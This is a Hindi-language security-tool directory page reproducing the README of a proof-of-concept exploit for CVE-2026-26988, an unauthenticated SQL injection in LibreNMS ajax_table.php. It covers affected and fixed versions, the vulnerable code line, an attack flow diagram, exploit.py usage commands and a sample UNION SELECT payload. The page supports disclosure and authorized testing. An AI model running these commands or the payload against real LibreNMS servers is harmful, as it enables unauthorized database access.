Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26988-LibreNMS-SQLi — लाइब्रेएनएमएस ajax_table.php में अनप्रमाणित SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो अधिकृत सुरक्षा परीक्षण के लिए समय-आधारित और बूलियन-आधारित ब्लाइंड इंजेक्शन तकनीकों का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

लाइब्रेएनएमएस ajax_table.php में अनप्रमाणित SQL इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो अधिकृत सुरक्षा परीक्षण के लिए समय-आधारित और बूलियन-आधारित ब्लाइंड इंजेक्शन तकनीकों का प्रदर्शन करता है।

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – LibreNMS बिना प्रमाणीकरण SQL इंजेक्शन PoC

LibreNMS ajax_table.php में IPv6 पता खोज पैरामीटर के माध्यम से बिना प्रमाणीकरण SQL इंजेक्शन।

  • प्रभावित संस्करण: LibreNMS ≤ 25.12.0
  • समाधान: LibreNMS ≥ 26.1 (कमिट 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 क्रिटिकल
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (SQL कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन – SQL इंजेक्शन)
  • भेद्यता सारांश

    search_type=ipv6 होने पर address पैरामीटर को / पर पते और प्रीफिक्स में विभाजित किया जाता है।
    प्रीफिक्स को बिना एस्केपिंग के सीधे SQL क्वेरी में संयोजित किया जाता है:

    root@kitploit:~
    $sql .= " AND ipv6_prefixlen = '$prefix'";
    

    प्रीफिक्स भाग में एक सिंगल कोट (') स्ट्रिंग लिटरल से बाहर निकलने की अनुमति देता है → मनमाना SQL इंजेक्शन।

    हमले का प्रवाह आरेख

    root@kitploit:~
    flowchart TD
        A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
        B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
        C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
        D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
        E -->|5. Execute injected query| F[Return results / error / delay]
        F -->|6. Attacker observes response / timing| A
    
        subgraph "Injection Point"
            D
        end
    
        style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
    

    प्रूफ-ऑफ-कॉन्सेप्ट उपयोग

    आवश्यकताएँ

    • Python 3.x
    • requests लाइब्रेरी (pip install requests)

    बुनियादी परीक्षण (सिंटैक्स त्रुटि / 500)

    root@kitploit:~
    python3 exploit.py http://target/librenms --test
    

    समय-आधारित ब्लाइंड पुष्टि (अनुशंसित)

    root@kitploit:~
    python3 exploit.py http://192.168.1.50/librenms --time
    

    → यदि प्रतिक्रिया में >5–6 सेकंड लगते हैं → भेद्य

    बूलियन-आधारित ब्लाइंड परीक्षण

    root@kitploit:~
    python3 exploit.py http://target/librenms --boolean
    

    कस्टम पेलोड उदाहरण

    root@kitploit:~
    python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
    

    इस रिपॉजिटरी में फ़ाइलें

    • exploit.py .............. मुख्य PoC स्क्रिप्ट (आवश्यकता पड़ने पर cve-2026-26988-poc.py से नाम बदलें)
    • README.md ............... यह फ़ाइल

    जिम्मेदार प्रकटीकरण

    • रिपोर्ट किया गया: फरवरी 2026 (GitHub Security Advisory के माध्यम से)
    • समाधान: कमिट 15429580baba... → PR #18777
    • सलाह: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

    कानूनी और नैतिक नोटिस

    यह प्रूफ-ऑफ-कॉन्सेप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

    इस कोड का उपयोग किसी भी सिस्टम या नेटवर्क के विरुद्ध मालिक से स्पष्ट लिखित अनुमति के बिना न करें।
    अनधिकृत उपयोग अमेरिका में Computer Fraud and Abuse Act (CFAA) या आपके देश के समकक्ष कानून सहित (लेकिन इन्हीं तक सीमित नहीं) कानूनों का उल्लंघन कर सकता है।

    अपने जोखिम पर उपयोग करें।


    लेखक: Mohammed Idrees Banyamer
    Instagram: @banyamer_security
    दिनांक: 20 फरवरी, 2026

    टूल डाउनलोड करें